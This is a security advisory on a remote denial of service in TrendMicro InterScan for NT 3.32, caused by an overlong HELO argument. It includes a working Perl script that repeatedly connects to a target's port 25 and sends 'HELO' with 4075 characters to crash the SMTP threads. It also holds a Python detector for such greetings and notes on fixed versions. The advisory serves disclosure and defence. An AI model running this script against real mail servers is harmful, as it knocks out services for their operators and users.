COMMAND

    Interscan

SYSTEMS AFFECTED

    Interscan NT/3.32

PROBLEM

    During an audit, Alain Thivillon found a new remote DoS in
    TrendMicro Interscan for NT (latest version V3.32, builds 1011 and
    1022). Last October, USSR Labs found a buffer overflow in the HELO
    command and wrote a very nice exploit with shell code, giving
    SYSTEM shell access to a remote attacker. Trendmicro closed the
    hole, but unfortunately the patch was not complete: by sending a
    HELO followed by exactly 4075 to 4090 characters, the SMTP task
    crashes immediately. Depending on the NT debugger currently
    installed, this crash can stop all other SMTP threads (if DrWatson
    is called) or just reduce the number of remaining incoming threads
    (default value is 25).

    Below is a perl script you can use to test your vulnerability;
    the Nessus version scheduled for today will include a NASL script.

    #!/usr/bin/perl

    # (c) Alain Thivillon & Stephane Aubert
    #     Herve Schauer Consultants 2000
    #     http://www.hsc.fr/
    #
    #     Do not use this stuff against Microsoft MX hosts :)
    #
    # Crash Interscan SMTP Server on Windows NT Version 3.32 Builds 1011 and 1022
    # Depending on the debugger installed on NT, the crash can be immediate if you
    # use Drwatson.32.exe (new connections get stuck), or can be limited to a single
    # thread if Auto=0 in the NT Debug key. Interscan limits the number of running
    # threads (default 25) so it's very easy to exhaust all threads and finally
    # force the answer '452 Too Busy'

    use Socket;
    use FileHandle;

    $vict=$ARGV[0];

    $AF_INET = 2;
    $SOCK_STREAM = 1;
    $proto = getprotobyname('tcp');   # protocol number passed to socket()
    $port=25;
    $sockaddr = 'S n a4 x8';

    ($name, $aliases, $type, $len, $thataddr) = gethostbyname($vict);
    $that = pack($sockaddr, $AF_INET, $port, $thataddr);

    while (1) {
      $mysock=new FileHandle;
      socket($mysock, $AF_INET, $SOCK_STREAM, $proto) || die "socket failed\n";
      connect($mysock, $that) || die "Connect failed\n";
      select($mysock); $| = 1; select(STDOUT); $| = 1;

      $line = <$mysock>;
      print $line;
      print $mysock "HELO ",'a'x4075,"\r\n";
      $line = <$mysock>;
      print $line;
      close $mysock;
    }
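    As an added defender-side example (not part of the original advisory or of the
    Perl script above), the following Python code inspects client SMTP command
    lines and flags HELO/EHLO arguments that exceed the RFC 5321 domain-name limit
    of 255 octets, and separately those that fall in the 4075 to 4090 byte window
    the advisory describes. The function names, thresholds and sample session
    lines are constructed for this illustration.

```python
import re

# RFC 5321 limits a domain name to 255 octets; the advisory gives
# 4075..4090 bytes as the HELO argument window that crashes InterScan 3.32.
MAX_DOMAIN_LEN = 255
CRASH_WINDOW = (4075, 4090)

# Match a HELO/EHLO command with an optional single argument.
CMD_RE = re.compile(r'^(HELO|EHLO)(?:\s+(\S*))?\s*$', re.IGNORECASE)


def inspect_helo(line):
    """Classify one client SMTP command line.

    Returns None if the line is not a HELO/EHLO; otherwise a dict with the
    command, the argument length and a verdict of 'ok', 'oversized'
    (longer than a legal domain name) or 'crash-window' (in the advisory's
    4075..4090 byte range)."""
    m = CMD_RE.match(line.rstrip('\r\n'))
    if not m:
        return None
    arg = m.group(2) or ''
    n = len(arg)
    if CRASH_WINDOW[0] <= n <= CRASH_WINDOW[1]:
        verdict = 'crash-window'
    elif n > MAX_DOMAIN_LEN:
        verdict = 'oversized'
    else:
        verdict = 'ok'
    return {'command': m.group(1).upper(), 'length': n, 'verdict': verdict}


def scan_session(lines):
    """Return (line_number, verdict, length) for every suspicious HELO/EHLO."""
    findings = []
    for i, line in enumerate(lines, 1):
        r = inspect_helo(line)
        if r and r['verdict'] != 'ok':
            findings.append((i, r['verdict'], r['length']))
    return findings


# Constructed sample of client-side SMTP commands, including one benign
# greeting, one merely oversized argument and one in the crash window.
SAMPLE_SESSION = [
    "HELO mail.example.com\r\n",
    "MAIL FROM:<alice@example.com>\r\n",
    "EHLO " + "a" * 300 + "\r\n",
    "HELO " + "a" * 4075 + "\r\n",
]

if __name__ == "__main__":
    for finding in scan_session(SAMPLE_SESSION):
        print("line %d: %s (argument length %d)" % finding)
```

    The same check can be applied in front of a vulnerable relay to reject
    greetings longer than a legal domain name before they reach it.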

SOLUTION

    The DoS exploit outlined by Alain Thivillon above has been
    addressed in Trend Micro's InterScan v. 3.4 for Windows NT, which
    is currently in beta test at the time of writing. The new beta
    release can be downloaded from:

        http://www.antivirus.com/download/beta_programs/

    If you do not want to use the beta version and you are concerned
    about the DoS issues, you can download InterScan v. 3.25. You need
    to contact your Trend Micro support representative to get the 3.25
    release. Version 3.25 lacks a few of the features of version 3.32,
    but it is also not subject to the DoS exploits found in version
    3.32.